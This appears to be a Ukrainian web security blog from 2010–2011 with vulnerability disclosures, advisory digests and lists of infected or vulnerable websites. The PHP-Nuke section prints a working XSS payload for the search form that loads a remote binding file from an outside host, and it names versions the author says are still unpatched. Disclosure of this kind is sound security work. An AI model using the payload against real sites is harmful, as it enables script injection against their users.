Websecurity - Веб безпека

26.05.2010

У жовтні, 23.10.2009, я знайшов Insufficent Anti-automation уразливість на сайті http://depositfiles.com (файлообмінник). Про що найближчим часом сповіщу адміністрацію сайта.

Детальна інформація про уразливість з’явиться пізніше.

13.01.2011

Insufficent Anti-automation:

http://depositfiles.com/ru/tickets/

В контактній формі можна було ввести будь-який код капчі (тобто капча не працювала).

Дана уразливість зараз вже виправлена (шляхом заміни власної капчі на reCaptcha).

Виявлена можливість виконання коду в Apache Axis2 та програмних продуктах, що містять Axis2.

Уразливі продукти: ARCserve D2D 15, HP Universal CMDB Server 9.0, SAP BusinessObjects Crystal Reports Server 2008.

Обліковий запис за замовчуванням.

• CA ARCserve D2D r15 Web Service Apache Axis2 World Accessible Servlet Code Execution Vulnerability Poc (деталі)
• Security Notice for CA ARCserve D2D (деталі)

Додаткова інформація.

• Security Notice for CA ARCserve D2D (updated) (деталі)

Продовжуючи розпочату традицію, після попереднього відео про експлоіт для Microsoft Internet Explorer, пропоную нове відео на веб секюріті тематику. Цього разу відео про eксплоіт для Adobe Flash Player. Рекомендую подивитися всім хто цікавиться цією темою.

Metasploit Adobe Flash Player Button

В відео показаний процес атаки на користувачів Flash Player та Acrobat Reader (атака також можлива через їхні плагіни до браузерів). Дана уразливість стосується Flash Player 9.0, 10.0 і 10.1, Adobe Reader 9.4, Adobe Acrobat 9.4 та будь-яких інших продуктів, що включають флеш плеєр.

Для створення експлотіа використовується Metasploit Framework. Рекомендую подивитися дане відео для розуміння векторів атак на Flash Player та інші продукти з вбудованим флеш плеєром.

В даній добірці уразливості в веб додатках:

• HP OpenView NNM ovet_demandpoll sel CGI Variable Format String Remote Code Execution Vulnerability (деталі)
• HP OpenView NNM netmon sel CGI Variable Remote Code Execution Vulnerability (деталі)
• HP OpenView Network Node Manager (OV NNM), Remote Execution of Arbitrary Code (деталі)
• XSS vulnerability in AContent (деталі)
• XSS vulnerability in AContent (деталі)
• XSS vulnerability in ATutor (деталі)
• VMware View 3.1.3 addresses an important cross-site scripting vulnerability (деталі)
• XSS vulnerability in AChecker (деталі)
• XSS (cross site scripting) vulnerability in Serendipity (деталі)
• aria2 metalink “name” Directory Traversal Vulnerability (деталі)

Після попереднього дослідження інфікованих сайтів, приведу нову інформацію про заражені сайти. З числа українських сайтів.

• http://royalpalace.com.ua - інфекція була виявлена 09.11.2010. Зараз сайт не входить до переліку підозрілих.
• http://mygames.ws - інфекція була виявлена 22.11.2010. Зараз сайт входить до переліку підозрілих.
• http://ogo.rv.ua - інфекція була виявлена 24.10.2010. Зараз сайт не входить до переліку підозрілих.
• http://biznesplan.rv.ua - інфекція була виявлена 23.10.2010. Зараз сайт не входить до переліку підозрілих.
• http://gems.com.ua - інфекція була виявлена 26.11.2010. Зараз сайт не входить до переліку підозрілих.

Як і у випадку з іншими веб сайтами, інфіковані сайти royalpalace.com.ua і mygames.ws також хостить в себе Укртелеком.

Виявлене переповнення стека в Apache mod-fcgid - модулі FastCGI інтерфейса для Apache 2.

Уразливі версії: Apache mod_fcgid 2.3.

Переповнення стека при роботі додатка FCGI.

• New libapache2-mod-fcgid packages fixes stack overflow (деталі)

28.10.2010

У березні, 21.03.2010, я знайшов Cross-Site Scripting та Insufficient Anti-automation уразливості в PHP-Nuke. Які я виявив на одному сайті, а нещодавно перевірив їх на офіційному сайті phpnuke.org. Про що найближчим часом повідомлю розробникам.

Раніше я вже писав про уразливість в PHP-Nuke.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам системи.

11.01.2011

XSS:

POST запит на сторінці http://site/modules.php?name=Search

" style="-moz-binding:url('http://websecurity.com.ua/webtools/xss.xml#xss')

В полі пошуку.

Це версія для Mozilla та Firefox (до 3.0), використовуючи MouseOverJacking можна зробити версію для всіх браузерів.

Insufficient Anti-automation:

http://site/modules.php?name=Feedback

В формі немає захисту від автоматизованих запитів (капчі).

Уразливі PHP-Nuke 8.1 та попередні версії (перевірено в PHP-Nuke 8.0 та 8.1).

Дані уразливості досі не виправлені розробниками PHP-Nuke - ні в своїй системі, ні в себе на сайті.

З моїм тестуванням знань з веб безпеки ви вже знайомі. Сьогодні представляю вам новий тест - Тестування: уразливості та атаки.

Якщо в тестуванні №1 перевірялися знання з захисту веб сайтів та веб додатків, то в тестуванні №2 перевіряються атакуючі знання - ті, що стосуються знаходження та експлуатації уразливостей на веб сайтах та веб додатках. Тобто це хакерський тест.

Даний тест я планував розробити та розмістити на сайті ще в 2010 році, але знайшов час лише зараз. Тому в ньому одразу присутні 20 запитань: 10 за минулий рік і 10 за цей рік.

Успішного вам тестування .

В даній добірці уразливості в веб додатках:

• AlienTechnology ALR-9900 default root password and backdoor (деталі)
• New phpmyadmin packages fix several vulnerabilities (деталі)
• Vulnerabilities in OCS Inventory NG (деталі)
• HP OpenView NNM getnnmdata.exe CGI Invalid Hostname Remote Code Execution Vulnerability (деталі)
• HP OpenView NNM getnnmdata.exe CGI Invalid ICount Remote Code Execution Vulnerability (деталі)
• HP OpenView NNM getnnmdata.exe CGI Invalid MaxAge Remote Code Execution Vulnerability (деталі)
• HP OpenView NNM snmpviewer.exe CGI Multiple Variable Remote Code Execution Vulnerability (деталі)
• Directory Traversal in Axigen v7.4.1 running on Windows (деталі)
• XSS vulnerability in AContent search (деталі)
• XSS vulnerability in Atutor edit content folder (деталі)

10.11.2010

Продовжу тему безпеки секюріті сайтів, яку я піднімав в попередніх записах Безпека сайтів про безпеку, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18 та 19.

Ось нова добірка уразливих секюріті сайтів:

• www.scb-ua.com
• hackzona.com.ua
• www.bezpeka-service.com.ua

Всім security проектам та секюріті компаніям слід приділяти більше уваги безпеці власних веб сайтів.

10.01.2011

Ще одна добірка уразливих секюріті сайтів:

• asafesite.com
• www.hackerscenter.com
• ufsb.kiev.ua

Секюріті та хакерським веб проектам варто більше слідкувати за безпекою власних сайтів.